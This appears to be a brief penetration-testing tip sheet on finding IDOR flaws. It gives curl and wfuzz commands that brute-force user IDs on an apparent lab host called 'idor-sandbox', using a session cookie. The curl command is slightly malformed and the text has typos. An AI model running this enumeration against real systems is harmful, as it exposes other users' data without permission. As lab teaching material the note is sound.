Tips:

1. Static file IDOR is something like change 1.txt to 2.txt. Routing also can be considered but need some guesswork.
2. Database Object Referencing (ID based) IDOR refers to number like 1 to 2 or more complicated like 1a2eee3d-01-44mc11.

Use curl and wfuzz to brute force:

1. First use curl to obtain a length that is for invalid ID as a baseline, with authenticated cookie (-s means dowan progress, -w '%{size_download}' download means want response size):
   curl -s /dev/null http://idor-sandbox:80/user/?uid=91191 -w '%{size_download}' --header "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64"

2. Once you get that invalid response size, exclude it plus 404 using wfuzz: wfuzz -c -z file,/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt --hc 404 --hh 2873 -H "Cookie: PHPSESSID=2a19139a5af3b1e99dd277cfee87bd64" http://idor-sandbox:80/user/?uid=FUZZ